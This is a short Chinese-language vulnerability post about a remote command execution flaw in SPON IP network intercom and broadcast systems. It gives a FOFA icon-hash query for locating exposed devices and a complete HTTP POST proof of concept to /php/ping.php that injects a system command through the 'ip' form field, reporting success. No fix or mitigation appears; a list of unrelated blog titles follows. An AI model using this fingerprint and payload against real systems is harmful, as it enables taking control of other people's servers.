世邦通信股份有限公司IP网络对讲广播系统RCE

漏洞描述

SPON世邦IP网络广播系统采用的IPAudio™技术, 将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输的双向音频扩声系统。传统广播系统存在的音质不佳,传输距离有限,缺乏互动等问题。该系统设备使用简便,只需将终端接入计算机网络即可构成功能强大的数字广播系统,每个接入点无需单独布线,实现计算机网络、数字视频监控、公共广播的多网合一。其存在RCE漏洞,攻击者可通过此漏洞执行系统命令,进而控制服务器

漏洞复现

FOFA

复制代码
icon_hash="-1830859634"

POC

复制代码
POST /php/ping.php HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig

bp 成功执行命令

相关推荐
wdfk_prog5 小时前
实战教程:从“对象文件为空“到仓库重生——修复 Git 仓库损坏全记录
大数据·网络·笔记·git·学习·elasticsearch·全文检索
朱以真139177649525 小时前
码头岸电系统如何保障供电安全?安科瑞绝缘监测及故障定位方案解析
网络·安全
Bonnie_12156 小时前
11-netty基础-手写rpc-支持多序列化协议-03
网络·网络协议·rpc·jetty
Mr_wilson_liu6 小时前
网络拨测和业务拨测是什么意思
linux·网络
Doris_LMS8 小时前
一篇文章入门TCP与UDP(保姆级别)
网络·udp·tcp
摇光938 小时前
[复习]计算机网络
网络·计算机网络·国家电网
zx_zx_1238 小时前
套接字编程UDP
linux·网络·udp
chihongkeji_8 小时前
光纤滑环 – 光纤旋转接头(FORJ)- 杭州驰宏科技
网络·科技
wen__xvn9 小时前
计算机网络1-5:计算机网络的性能指标
网络·计算机网络
学习网安的doro9 小时前
3a服务器的基本功能1之身份认证
服务器·网络·学习·安全·身份认证·ac